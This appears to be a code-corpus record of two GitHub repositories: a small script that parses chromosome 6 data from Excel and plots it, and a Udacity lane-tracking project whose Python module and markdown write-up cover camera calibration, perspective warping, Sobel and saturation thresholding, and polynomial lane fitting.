raschet.raschet()\n\n y = 0\n while y < 10:\n self.table.setItem(y, 1, QTableWidgetItem(str(raschet.getYY(y))))\n y = y + 1\n\n def btn4Click(self):\n QApplication.exit()\n\nif __name__=='__main__':\n\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n"
}
] | 1 |
hylcos/CHR6Results
|
https://github.com/hylcos/CHR6Results
|
74a60d423f1ed33103bff10805018888e1e61695
|
a80ff7eaf02b3c7415816267a8f791791d9dd4e6
|
db6d7aa38763a9a2ad9bf1edefcd23a5f5d78981
|
refs/heads/master
| 2020-04-14T18:23:46.067772 | 2019-01-04T07:08:48 | 2019-01-04T07:08:48 | 164,017,329 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5249636173248291,
"alphanum_fraction": 0.5399903059005737,
"avg_line_length": 31.234375,
"blob_id": "cf444171be9b9254d39dded2d895d77f6dad1759",
"content_id": "5dbd65949b756a50c110dcf14cee77f10f67e2f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2063,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 64,
"path": "/main.py",
"repo_name": "hylcos/CHR6Results",
"src_encoding": "UTF-8",
"text": "import xlrd\nfrom xlrd.biffh import XL_CELL_EMPTY, XL_CELL_TEXT\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport re\n\n\nclass Patient:\n def __init__(self, data):\n self.Patient = data[0].value\n self.Platform = data[1].value\n self.Cytogenetic_aberration = data[2].value\n random_not = data[3].value\n numbers = re.findall(\"\\([0-9\\?_]*\\)\", random_not)\n self.chrom = list()\n for n in numbers:\n n = n.replace(\"(\", \"\").replace(\")\", \"\")\n n = n.split(\"_\")\n if n[0] == \"?\":\n self.chrom.append(int(n[1]))\n self.chrom.append(int(n[1]))\n elif n[1] == \"?\":\n self.chrom.append(int(n[0]))\n self.chrom.append(int(n[0]))\n else:\n p = (int(n[0]) + int(n[1])) // 2\n self.chrom.append(p)\n self.chrom.append(p)\n self.mb = self.chrom[2] - self.chrom[1]\n self.length = data[4].value\n print(self.mb, self.length)\n self.OMIM_genes = data[5].value\n self.OMIM_disease_related_genes = data[6].value\n self.Origin = data[7].value\n\n\nif __name__ == '__main__':\n patients = list()\n data_path = Path().cwd() / \"data\" / \"testdata.xlsx\"\n workbook = xlrd.open_workbook(str(data_path))\n geno = workbook.sheets()[0]\n rows = [row for row in geno.get_rows()]\n columns = [c.value for c in rows[0]]\n x = []\n for row in rows[1:]:\n if row[0].ctype is XL_CELL_TEXT and row[1].ctype is XL_CELL_EMPTY:\n patients.append(\"\")\n x.append([])\n elif row[0].ctype is XL_CELL_TEXT and row[1].ctype is XL_CELL_TEXT:\n p = Patient(row)\n patients.append(p.Patient)\n x.append(p.chrom)\n\n x.reverse()\n patients.reverse()\n df = pd.DataFrame(x, index=patients)\n\n print(df)\n df.T.boxplot(vert=False)\n plt.subplots_adjust(left=0.25)\n plt.gca().xaxis.set_major_formatter(plt.FormatStrFormatter('%d'))\n plt.show()\n"
},
{
"alpha_fraction": 0.8190476298332214,
"alphanum_fraction": 0.8380952477455139,
"avg_line_length": 51.5,
"blob_id": "65eccf1a45268ab78698f411471f529b9554fd8f",
"content_id": "e09bbeb04eb5ff747377ff506c2e237b54278f8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 105,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 2,
"path": "/README.md",
"repo_name": "hylcos/CHR6Results",
"src_encoding": "UTF-8",
"text": "# CHR6Results\nThis repositoy contains files for reading, extracting and displaying Chromosome 6 results.\n"
}
] | 2 |
qcqqcq/udacity-CarND-Advanced-Lane-Tracking-P4
|
https://github.com/qcqqcq/udacity-CarND-Advanced-Lane-Tracking-P4
|
ae8e8318bfa3e6e8388263d519685bfb303d863f
|
d7fda14e33644e9892e7758e2b87353b0a591617
|
d4ab0554e5f08fd0e7fcb6e3f51bdb0d4813d07b
|
refs/heads/master
| 2020-05-30T08:46:15.213488 | 2017-02-24T05:07:39 | 2017-02-24T05:07:39 | 82,618,498 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5929126739501953,
"alphanum_fraction": 0.6059442162513733,
"avg_line_length": 33.33280944824219,
"blob_id": "e96da4e59f8ef2c449933a99bd4d30bc45750b5d",
"content_id": "a1be1b70488e2ee76a6616a6a29c1b89d0bab238",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21870,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 637,
"path": "/tracktools.py",
"repo_name": "qcqqcq/udacity-CarND-Advanced-Lane-Tracking-P4",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\nimport glob\nimport matplotlib.image as mpimg\nimport pdb\n\n \n\ndef get_img_from_filename(file_name):\n '''Define explicit function to use correct imread. \n Avoids user using an imread that returns BGR instead of RGB\n '''\n\n return mpimg.imread(file_name)\n\n\n\nclass ImageProcessor():\n def __init__(self):\n self.mtx = None\n self.dist = None\n self.M = None\n self.Minv = None\n self.thresher = None\n\n def ingest_image(self,img):\n self.raw_img = img\n self.img = self.undistort_image(img)\n self.gray = cv2.cvtColor(self.img,cv2.COLOR_RGB2GRAY)\n\n self.num_rows = img.shape[0]\n self.num_cols = img.shape[1]\n\n ret = self.warp_perspective()\n if ret is None:\n print('Re-run ingest_image after setting warp points')\n\n ret = self.get_binary()\n if ret is None:\n print('Re-run ingest_image after ingesting a thresholder object ')\n\n def calibrate_from_existing(self,calibrated_processor):\n self.mtx = calibrated_processor.mtx\n self.dist = calibrated_processor.dist\n\n\n def calibrate_camera(self):\n ''' Calculates the correct camera matrix and distortion coefficients using the calibration chessboard images\n '''\n\n # Make a list of calibration image\n calibration_image_files = glob.glob('./camera_cal/calibration*.jpg')\n \n # Arrays to store object points and image points from all the images\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n \n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n # here we assume the object (checker board) is a flat surface, so the\n # z-values are all 0. \n objp = np.zeros((6*9,3), np.float32)\n objp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)\n \n \n # Step through the calibration images and search for chessboard corners\n for fname in calibration_image_files:\n # Read image from file and convert to gray\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n \n # Find the chessboard corners using gray channel\n ret, corners = cv2.findChessboardCorners(gray, (9,6),None)\n \n # If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n \n # Draw and display the corners\n #img = cv2.drawChessboardCorners(img, (9,6), corners, ret)\n #plt.imshow(img)\n \n # Use image and object points to calibrate camera\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None)\n\n self.mtx = mtx\n self.dist = dist\n \n \n def undistort_image(self,img):\n '''Undistored image to reduce radial and tangental distortion'''\n\n if (self.mtx is None) or (self.dist is None):\n print('Error: Camera not calibrated')\n raise Exception\n \n # Undistort\n undistorted = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n\n return undistorted\n\n def set_warp_source_points(self,top_row,bottom_row\n ,bottom_left,top_left\n ,top_right,bottom_right):\n '''Set source points for perspective warping'''\n\n # Arrange parameters into points\n src1 = (bottom_left,bottom_row) # Bottom left\n src2 = (top_left,top_row) # Top left\n src3 = (top_right,top_row) # Top right\n src4 = (bottom_right,bottom_row) # Bottom right\n\n # Save points as array of points\n self.src = np.float32([src1,src2,src3,src4]) \n \n \n # Get perpective transform\n self.get_perspective_transforms()\n\n def get_perspective_transforms(self):\n '''Set destination points for perspective warping and \n given src and dst points, calculate the perspective \n transform matrix'''\n\n offset = 300\n\n # Arrange points based on image size and offset\n dst1 = (offset,self.num_rows) # Bottom left\n dst2 = (dst1[0],offset) # Top left\n dst3 = (self.num_cols-offset,dst2[1]) # Top right\n dst4 = (dst3[0],dst1[1]) # Bottom right\n \n # Save points as array of points\n self.dst = np.float32([dst1, dst2, dst3, dst4])\n\n # Get perspective transform\n self.M = cv2.getPerspectiveTransform(self.src, self.dst)\n self.Minv = cv2.getPerspectiveTransform(self.dst, self.src)\n\n def warp_perspective(self):\n '''Perform warp to get bird's eye perspective'''\n\n if self.M is None:\n print('Perspective warp not performed, transform matrix is None')\n return\n\n warped = cv2.warpPerspective(self.img, self.M, (self.num_cols,self.num_rows))\n self.warped = warped\n\n # Also make a gray version\n self.warped_gray = cv2.cvtColor(warped,cv2.COLOR_BGR2GRAY)\n\n return warped\n\n\n def ingest_lanes(self,left_lane,right_lane,lane_verifier):\n\n lane_verifier.ingest_lanes(left_lane,right_lane)\n\n '''Fill area between lane'''\n\n # Create an image to draw the lines on\n zero_img = np.zeros_like(self.binary).astype(np.uint8)\n filled_lanes = np.dstack((zero_img, zero_img,zero_img))\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_lane.smooth_poly_cols,left_lane.poly_rows]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_lane.smooth_poly_cols, right_lane.poly_rows])))])\n #pts_right = np.array([np.flipud(np.transpose(np.vstack([poly_lanes['right'][1], poly_lanes['right'][0]])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(filled_lanes, np.int_([pts]), (0,255, 0))\n\n unwarped_lanes = cv2.warpPerspective(filled_lanes, self.Minv, (self.num_cols,self.num_rows))\n overlayed_image = cv2.addWeighted(self.img, 1, unwarped_lanes, 0.3, 0)\n\n self.overlayed = overlayed_image\n self.unwarped_lanes = unwarped_lanes\n self.get_offset_from_center()\n\n\n # Annotate image\n font = cv2.FONT_HERSHEY_SIMPLEX\n # Left curve\n curve_str = 'Left Radius of Curvature: %im'%left_lane.radius_of_curve\n cv2.putText(overlayed_image,curve_str,(100,100),font,1,(255,255,255),2,cv2.LINE_AA)\n\n # Right curve\n curve_str = 'Right Radius of Curvature: %im'%right_lane.radius_of_curve\n cv2.putText(overlayed_image,curve_str,(100,200),font,1,(255,255,255),2,cv2.LINE_AA)\n\n # Distance to right\n distance_str = 'Offset from Center (+ is Right): %.1f'%self.meters_to_right\n cv2.putText(overlayed_image,distance_str,(100,300),font,1,(255,255,255),2,cv2.LINE_AA)\n\n \n\n\n\n def get_offset_from_center(self):\n _,hot_cols = self.unwarped_lanes[:,:,1].nonzero()\n\n # Lane width\n left_lane_px = min(hot_cols) \n right_lane_px = max(hot_cols)\n lane_width_px = right_lane_px - left_lane_px\n \n # Meters per pixel\n lane_width_m = 3.7\n m_per_px = lane_width_m/lane_width_px\n \n # Lane center\n lane_center = (left_lane_px + right_lane_px)/2\n image_center = self.overlayed.shape[1]/2\n\n # Offset from center\n pixels_to_right = image_center - lane_center\n meters_to_right = pixels_to_right*m_per_px\n \n self.meters_to_right = meters_to_right\n\n def ingest_thresher(self,thresher):\n self.thresher = thresher\n\n def get_binary(self):\n if self.thresher is None: return\n self.binary = self.thresher.get_binary(self)\n return self.binary\n\n\nclass Thresher():\n ''' Thresholds images to form binaries\n Usually not used directly. Just to visualization purposes'''\n\n def __init__(self,sobel_kernel,dir_thresh,mag_thresh,s_thresh):\n self.absgraddir = None\n\n # Set thresholds\n self.sobel_kernel = sobel_kernel\n self.dir_thresh = dir_thresh\n self.mag_thresh = mag_thresh\n self.s_thresh = s_thresh\n\n\n def calculate_sobel(self,gray):\n '''Calculates X and Y direction Sobels'''\n\n \n # Calcualte sobel\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=self.sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=self.sobel_kernel) \n\n\n # Calculate quantities derived from Sobel\n\n # Absolute direction of Sobel gradient\n self.absgraddir = np.arctan2(np.absolute(sobely), np.absolute(sobelx))\n # Magnitude of Sobel gradient\n gradmag = np.sqrt(sobelx**2 + sobely**2)\n # Rescale to 8 bit\n scale_factor = np.max(gradmag)/255 \n self.gradmag = (gradmag/scale_factor).astype(np.uint8) \n\n\n def sobel_direction_threshold(self,gray):\n '''Create binary based on Sobel direction thresholding'''\n \n # Take the absolute value of the gradient direction, \n # apply a threshold, and create a binary image result\n\n self.calculate_sobel(gray)\n \n thresh = self.dir_thresh\n binary_output = np.zeros_like(self.absgraddir)\n binary_output[(self.absgraddir >= thresh[0]) & (self.absgraddir <= thresh[1])] = 1\n \n # Return the binary\n return binary_output\n \n \n def sobel_magnitude_threshold(self,gray):\n '''Create binary based on Sobel magnitude thresholding'''\n\n self.calculate_sobel(gray)\n \n thresh = self.mag_thresh\n binary_output = np.zeros_like(self.gradmag)\n binary_output[(self.gradmag >= thresh[0]) & (self.gradmag <= thresh[1])] = 1\n \n # Return the binary\n return binary_output\n \n def saturation_threshold(self,img):\n '''Threshold the S-channel of HLS'''\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS) \n h_channel = hls[:,:,0]\n l_channel = hls[:,:,1]\n s_channel = hls[:,:,2]\n\n self.s_channel = s_channel\n \n thresh = self.s_thresh\n binary_output = np.zeros_like(s_channel)\n binary_output[(s_channel >= thresh[0]) & (s_channel <= thresh[1])] = 1\n\n # Return the binary\n return binary_output\n \n def get_binary(self,img_processor,thresh=0.5):\n '''Main method to create a combined binary image'''\n\n sobel_direction_binary = self.sobel_direction_threshold(img_processor.warped_gray)\n sobel_magnitude_binary = self.sobel_magnitude_threshold(img_processor.warped_gray)\n saturation_binary = self.saturation_threshold(img_processor.warped)\n\n # Combine the averaging binaries\n self.ensemble = np.average([sobel_magnitude_binary,saturation_binary],weights=[1,1],axis=0)\n\n ensemble_binary = self.ensemble >= thresh\n\n combined_binary = np.zeros_like(self.s_channel)\n \n # Excluding direction binary for now\n combined_binary[ensemble_binary] = 1\n \n return combined_binary\n\n\n\nclass LaneTracker():\n def __init__(self,lane,xm_per_pix,ym_per_pix\n ,window_height=40,window_width=150,minpix=50):\n \n\n self.window_height = window_height # number of pixels for window height\n self.window_width = window_width # number of pixels for window width\n self.minpix = minpix # number pixels needed to recenter window\n\n # Meters to pixels conversion\n self.xm_per_pix = xm_per_pix\n self.ym_per_pix = ym_per_pix\n\n if lane not in ['left','right']:\n print('Choose lane as left or right and not %s'%lane)\n self.lane = lane\n\n\n # Initialize tracking statistics from past detections\n self.polyfit = None\n\n def reset(self):\n self.polyfit = None\n\n def get_initial_lane_col(self):\n '''Make initial guess of lane position (column pixel)\n based on histogram of bottom half of binary image'''\n\n # Calculate bottom half histogram\n histogram = np.sum(self.bimg[int(self.bimg.shape[0]/2):]\n ,axis=0)\n self.histogram = histogram\n\n # Guess left and right lane position based on peaks in histogram\n midpoint= int(len(histogram)/2)\n if self.lane == 'left':\n lane_col = np.argmax(histogram[:midpoint])\n else: lane_col = np.argmax(histogram[midpoint:]) + midpoint\n\n return lane_col\n\n def _find_lane_in_window(self,hot_rows,hot_cols,window):\n\n '''Find hot indices within a small window of image'''\n\n # Indices for hot pixels between top and bottom row\n within_top_bot = (hot_rows <= window.bottom) & (hot_rows > window.top)\n \n # Indices for in the band and within Left window\n within_left_right = (hot_cols >= window.left) & (hot_cols < window.right)\n\n # Indices within top,bottom,left, and right\n # and thus within the window\n within_window = within_top_bot & within_left_right\n\n hot_inds, = within_window.nonzero()\n return hot_inds\n\n\n\n def search_entire_image(self,hot_rows,hot_cols,draw=False):\n '''Search entire image of lanes using iteration of sliding window'''\n\n # Get initial lane positions using histogram\n init_lane_col = self.get_initial_lane_col()\n bottom_row = self.bimg.shape[0]\n\n\n # Initialize window\n win = Window(self.window_height,self.window_width)\n win.update_position(init_lane_col,bottom_row)\n\n\n # Holder for all lane pixel indices throughout binary image\n lane_inds = []\n\n\n # Iterate through windows while window is within image\n while win.top > 0:\n\n # Draw for debug and documentation\n if draw:\n cv2.rectangle(self.out_img,(win.left,win.bottom)\n ,(win.right,win.top),(0,255,0), 2)\n \n # Get indices of hot pixels within window\n hot_ind = self._find_lane_in_window(hot_rows,hot_cols,win)\n lane_inds.append(hot_ind)\n\n # If enough pixels are hot, shift the window\n if len(hot_ind) >= self.minpix:\n center_col = int(np.mean(hot_cols[hot_ind]))\n else: center_col = win.center_col\n\n # Update window position\n win.update_position(center_col)\n\n\n # Post-iteration cleanup\n # Combine hot indices\n lane_inds = np.concatenate(lane_inds) \n\n # Get pixel values of left and right lanes\n lane_rows = hot_rows[lane_inds]\n lane_cols = hot_cols[lane_inds]\n\n return lane_rows,lane_cols\n\n def find_near_previous(self,hot_rows,hot_cols):\n '''Find hot pixels close to previously drawn polyfit'''\n\n # Set margin around previous lane to accept new pixels\n margin = 100\n \n # Determine polynomial line fit from previous fit\n previous_cols = self.apply_polyfit(hot_rows,self.polyfit)\n\n # Find indices where new lane is within margin of previous lane\n lane_inds = (hot_cols < (previous_cols + margin)) & (hot_cols > (previous_cols - margin))\n\n # Get pixel values of left and right lanes\n lane_rows = hot_rows[lane_inds]\n lane_cols = hot_cols[lane_inds]\n\n return lane_rows,lane_cols\n\n def find_lane(self,img_processor,draw=False):\n '''Iteratively search of lanes within small windows. Start from\n bottom of image and move windows towards top of image until no\n longer within image. \n '''\n\n # Save incoming image\n self.bimg = img_processor.binary\n\n # Preprae output image on which overlays will be placed\n self.out_img = np.dstack((self.bimg,self.bimg,self.bimg))*255\n\n # Get \"hot\" rows and columns. Hot means binary = 1\n # These are arrays of pixel values where the binary image\n # is not zero. Variable names ending in _ind represent\n # indices into these arrays\n hot_rows,hot_cols = self.bimg.nonzero()\n \n # The actual search for lane pixels\n if self.polyfit is None:\n lane_rows,lane_cols = self.search_entire_image(hot_rows,hot_cols,draw=draw)\n else:\n lane_rows,lane_cols = self.find_near_previous(hot_rows,hot_cols)\n\n\n # Get radius of curvature\n self.radius_of_curve = self.get_curvature(lane_rows,lane_cols)\n\n # Fit raw polynomial in pixel space\n self.poly_rows,self.poly_cols,self.polyfit = self.get_polyfit(lane_rows,lane_cols)\n\n # Draw lane pixels \n if draw:\n # Draw hot pixels\n if self.lane == 'left': color = [255,0,0]\n else: color = [0,0,255]\n self.out_img[lane_rows,lane_cols] = color\n\n\n def apply_polyfit(self,poly_rows,polyfit):\n '''Return polynomial estimated columns for an array of rows'''\n\n # Polynomial of row array\n poly_rows_matrix = np.vstack([poly_rows**2,poly_rows,np.ones_like(poly_rows)]).T\n \n # Multiply polynomial with coefficients\n poly_cols = np.dot(poly_rows_matrix,polyfit)\n \n return poly_cols\n\n def get_polyfit(self,lane_rows,lane_cols):\n '''Fit a 2nd degree polynomial. Lane rows and cols can be in pixels\n or meters, it doesn't matter '''\n \n # Fit weighted polynomial\n polyfit = np.polyfit(lane_rows, lane_cols,2)\n \n # Create rows for which polynomial will be calculated for\n poly_rows = np.arange(self.out_img.shape[0])\n poly_cols = self.apply_polyfit(poly_rows,polyfit)\n \n\n return poly_rows,poly_cols,polyfit\n\n def get_curvature(self,lane_rows,lane_cols):\n\n # Pixels to meters conversion\n lane_rows_meters = lane_rows*self.ym_per_pix\n lane_cols_meters = lane_cols*self.xm_per_pix\n\n _,_,polyfit_meters = self.get_polyfit(lane_rows_meters,lane_cols_meters)\n # Calculate the radii of curvature\n # y_eval is y position at which curvature is to be calculated\n # Example values: 632.1 m 626.2 m\n y_eval = self.out_img.shape[0]\n y_eval_meters = y_eval*self.ym_per_pix\n\n radius_curve = ((1 + (2*polyfit_meters[0]*y_eval_meters + polyfit_meters[1])**2)**1.5) / np.absolute(2*polyfit_meters[0])\n\n return radius_curve\n\n\n \nclass Window():\n def __init__(self,height=40,width=150):\n \n # Set window parameters\n self.height = height # number of pixels for window height\n self.width = width # number of pixels for window width\n\n \n def update_position(self,center_col,bottom_row=None):\n\n # Save center column\n self.center_col = center_col\n\n # Left and right columns\n self.left = center_col - int(self.width/2)\n self.right = self.left + self.width\n\n # Window rows\n # If no bottom row is given, use the current top row\n if bottom_row is None:\n self.bottom = self.top\n else:\n self.bottom = bottom_row\n self.top = self.bottom - self.height\n\n if self.top <= 0:\n self.top = 0\n\nclass LaneVerifier:\n def __init__(self):\n self.left_history = []\n self.right_history = []\n self.history_length = 10\n self.sd_width_thresh = 80 # in pixels\n self.mean_width_thresh = 900 # in pixels\n \n self.last_left_good_poly_cols = None\n self.last_right_good_poly_cols = None\n\n def ingest_lanes(self,left_tracker,right_tracker):\n\n self.left_history.append(left_tracker)\n self.right_history.append(right_tracker)\n if len(self.left_history) > self.history_length:\n self.left_history.pop(0)\n if len(self.right_history) > self.history_length:\n self.right_history.pop(0)\n \n # Smoothen lane tracks using history \n left_tracker.smooth_poly_cols = self.smooth_lane(self.left_history)\n right_tracker.smooth_poly_cols = self.smooth_lane(self.right_history)\n \n \n # Check consistency for the pair\n if self.pair_consistent(left_tracker.smooth_poly_cols,right_tracker.smooth_poly_cols):\n self.last_left_good_poly_cols = left_tracker.smooth_poly_cols\n self.last_right_good_poly_cols = right_tracker.smooth_poly_cols\n #print('consisten')\n \n elif (self.last_left_good_poly_cols is not None \n and self.last_right_good_poly_cols is not None):\n \n left_tracker.smooth_poly_cols = self.last_left_good_poly_cols\n right_tracker.smooth_poly_cols = self.last_right_good_poly_cols\n \n #print('lanes no good')\n\n\n def smooth_lane(self,history):\n '''Take weighted average of last lane detections'''\n\n poly_cols = np.array([track.poly_cols for track in history]) \n smooth_poly = np.average(poly_cols,axis=0\n ,weights=1+np.arange(len(history)))\n\n return smooth_poly\n \n def pair_consistent(self,left_smooth_poly_cols,right_smooth_poly_cols):\n '''Do checks at the pair level'''\n consistent = True\n \n # Ensure parallel\n self.pixel_width = right_smooth_poly_cols - left_smooth_poly_cols\n \n #print('SD %.2f'%np.std(self.pixel_width))\n #print('Mean %.2f'%np.average(self.pixel_width))\n if np.std(self.pixel_width) > self.sd_width_thresh:\n consistent = False\n elif np.average(self.pixel_width) > self.mean_width_thresh:\n consistent = False\n \n return consistent\n\n\nif __name__ == '__main__':\n # Test code\n tools = CameraTools()\n tools.calibrate_camera()\n"
},
{
"alpha_fraction": 0.7775919437408447,
"alphanum_fraction": 0.7827759385108948,
"avg_line_length": 70.61676788330078,
"blob_id": "3a91d708a5f82aae1413f1c10ddb22affa8ecb37",
"content_id": "c13e071bdf0e0caad4975671f516fe188e29cac5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11960,
"license_type": "no_license",
"max_line_length": 725,
"num_lines": 167,
"path": "/index.md",
"repo_name": "qcqqcq/udacity-CarND-Advanced-Lane-Tracking-P4",
"src_encoding": "UTF-8",
"text": "---\ntitle: Lane Tracking for Autonomous Vehicles\ntagline: Tracking lanes using classical machine vision for the Udacity AV Nanodegree Program\ndescription: Tracking lanes using classical machine vision for the Udacity AV Nanodegree Program\n---\n\n*This is part of my series on the Udacity Self Driving Car Nanodegree Program*\n\nOne of the cool things about autonomous vehicle technlogies is that it takes ideas from all fields. While deep neural networks are all the rage nowadays, classical machine vision still has it's place in the field. Will this still be the case in the next 30 years? Only time will tell. In the meanwhile, check out what I did using a simple workflow with Sobel operators and a few transforms identify and track lane lines. I'll start out showing the end results first:\n\n\n[](https://www.youtube.com/watch?v=_2KKQbVfB2E)\n\n\nIf clicking the above image doesn't take you to the video, trying using the [Video Link Here](https://youtu.be/_2KKQbVfB2E)\n\n## Overall Steps\n\nTo create the video, the following steps were taken:\n\n* Calibrate the camera using given a set of chessboard images to correct for radial and tangental distortions.\n* Apply a distortion correction to raw images.\n* Apply a perspective transform to rectify the image (\"birds-eye view\").\n* Use color transforms, gradients, etc. and apply thresholds to obtain a binary image\n* Detect lane pixels and fit to find the lane boundary.\n* Determine the curvature of the lane and vehicle position with respect to center.\n* Warp the detected lane boundaries back onto the original image.\n* Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.\n\n[//]: # (Image References)\n\n[checker]: ./output_images/undistorted_checker.jpg \"Calib\"\n[undistort]: ./output_images/undistorted_road.jpg \"Undistort\"\n[warp_src]: ./output_images/warp_source.jpg \"Warp Src\"\n[warp_src_zoom]: ./output_images/warp_source_zoomed.jpg \"Warp Src Zoom\"\n[warp]: ./output_images/warped_road.jpg \"Warp\"\n\n[sobel_mag]: ./output_images/sobel_mag.jpg \"SobelMag\"\n[sobel_mag_bin]: ./output_images/sobel_mag_bin.jpg \"SobelMagBin\"\n[sobel_dir]: ./output_images/sobel_dir.jpg \"SobelDir\"\n[sobel_dir_bin]: ./output_images/sobel_dir_bin.jpg \"SobelDirBin\"\n[sat]: ./output_images/saturation.jpg \"Sat\"\n[sat_bin]: ./output_images/saturation_bin.jpg \"SatBin\"\n[combo]: ./output_images/combined_bin.jpg \"Combo\"\n\n[hist]: ./output_images/binary_histogram.jpg \"hist\"\n[win]: ./output_images/windows_polynomial.jpg \"hist\"\n\n[overlaid]: ./output_images/overlaid.jpg \"ol\"\n\n## Camera Calibration\n\nCheckerboard calibration images are given in the repository They tell the camera what a flat, straight, perpendicular lines look like so it can apply the appropriate corrections. Check out how it corrects the below image:\n\n![alt text][checker]\n\nNotice how in the left image, you can intuitively tell that something's not quite right. If you look closely, you'll notice the checkerboard lines are quite...straight. They seem \"bent\" somehow. This is kind of [distortion](https://en.wikipedia.org/wiki/Distortion_(optics)) is actually present in almost any lens out there. You probably didn't notice since today's high tech cameras where the lens position never changes already correct for this. Also, you probably aren't taking pictures of checkerboards so it's not actually that easy to tell.\n\nBelow is the correction applied to a real world image. See any differences?\n\n![alt text][undistort]\n\nI can't tell either. I guess maybe if I take out the photo editor and overlay some lines maybe I can tell. But for most artistic pictures of the kids, this kind of thing probably isn't noticable. BUT, since we're doing careful lane tracking here, we need to be a bit more careful.\n\n## Perspective Transform\n\nA perspective transform takes the image from the vehcile view to a bird's eye view. To acheive this, \"source\" points must be identified which correspond to 4 points that form a rectangle in the bird's eye view. This only needs to be done once and can be applied to all other images as long as the camera is not moved. Source point identification can be done using machine vision but here it is manually selected using trial and error.\n\nA test image with straight lanes is used. Source points are shown below. These points resulted in two parallel lines after applying the transform.\n\n![alt text][warp_src] \n![alt text][warp_src_zoom] \n\nHere's the perpsective transform applied to a more curvey road:\n\n![alt text][warp] \n\nAlso notice how this process also sets a region of interest. It allows us to ignore anything outside of this bird's eye view. This comes in handy when we're applying transforms and deciding on which threshold values to use.\n\n## Thresholding to get a binary image\n\nNow that image has been transformed to a bird's eye view (which also identifies a region of interest), lanes are identified. In this approach, various transforms are applied and threshold values are chosen based on qualitative evaluation based on test images and the project video. We then form binary images where if the transformed pixel has values within the threshold range, we set that pixel to 1, otherwise set it to 0. This gives a binary image. Since might seem unclear at first if you're not from the machine vision world, so I'll outine the steps below.\n\nThe three transformations applied are\n* Sobel magnitude\n* Sobel direction\n* Saturation level (after HSL conversion)\n\n\n### Sobel Magnitude\n\nSobel magnitude is calculated by converting the image to gray scale (i.e. a black and white image) then applying the [Sobel Operator](https://en.wikipedia.org/wiki/Sobel_operator) in X and y directions (thus forming a 2D vector at every pixel) and taking the magnitude. This vector is the gradient of the pixel intensities. The image below show the transformation:\n\n![alt text][sobel_mag]\n\nHere the colorbar values are the magnitutes of the Sobel vectors. After viewing a bunch of images and experimenting with different threshold values, I chose to accept only pixels in the range of [30-100]. Thresholding on this (within range = 1, outside range = 0) results in the following binary image:\n\n![alt text][sobel_mag_bin]\n\n\n### Sobel Direction\n\nThe same procedure is done for the direction of the Sobel vectors:\n\n![alt text][sobel_dir]\n\nwhere accepted values are in [0-0.4], resulting in the following binary:\n\n![alt text][sobel_dir_bin]\n\n\n### Color Saturation\nNormally, images are described in terms of the pixel's RGB (red-green-blue) values. But for image processing, this is isn't always the best respresentation. Here, we first convert the image to HSL (hue-saturation-luminance) space, then threshold only based on the saturation channel:\n\n![alt text][sat]\n\nand accepting only values [120,220] gives:\n\n![alt text][sat_bin]\n\n\n### Combining Binary Images\nCombining the various binary images into a final image can be done a number of ways. Here, the combined binary chosen to be the union of the Sobel magnitude binary and saturation binary. The Sobel direction binary was deemed too noisy. The combined binary is shown below:\n\n![alt text][combo]\n\n\n## Identifying which binary pixels are part of the lane lines\n\nFrom the binary image, the lane lines become clear with occasional noise. To fit a polynomial and guess the middle of the lane lines are, we have to further refine which pixels are lanes and which (left or right) lane the pixels belong to. To make an initial guess of the lane positions, a histogram of the binary values along each column is calculated. The histgram only evaluates pixels in the lower half of the image.\n\n![alt text][hist]\n\n\nThe x axis represents columns in the combined binary image and the y axis is the number of (binary) pixels are 1 (and not 0) within that row. From looking at the peaks of the histogram and dividing along the center (pixel 640 in the horizontal direction), the initial position (lowest in the image) of both lanes are determined. From here, we do a window search, shown below and explained after the image:\n\n![alt text][win]\n\nThe windows heights are 40 pixels and widths are 150 pixels. The first window is at the lowest part of the image and centered along the initial left and right values (determined from the histogram). All pixels within the lowest window are identified (and colored for visualization). The windows then shift up until they reach the highest pixels. With every shift up, the windows can be re-centered if more than 50 pixels are idntified in the window. If so, the next window is centered around the mean of the column values of the current window. \n\nOnce pixel values are identified, a second degree polynomial is fit along the values to determine the center of each lane (shown in yellow above).\n\nOnce this whole-image search is completed, in the next frame left and right lane pixels are identified if they simply lay within a margin (100 pixels to the left or 100 pixels to the right) of the polynomial fit. A new polynomial is then fit with these new pixel values.\n\n\n### Radius of curvature\n\nTo calculate the radius of curvature, a conversion from pixels to meters is required. By assuming a standard lane width of 3.7 meters and counting horizontal pixels, it is determined that there are 3.7/672 pixels per meter in the horizontal direction. By assuming a lane segment is 3 meters in the vertical direction, it is determined that there are 3/65 meters per pixel in the vertical direction. By using these ratios to convert to meters and re-fitting the polynomial, the polynomial coefficients are used to calculat the radius of curvature 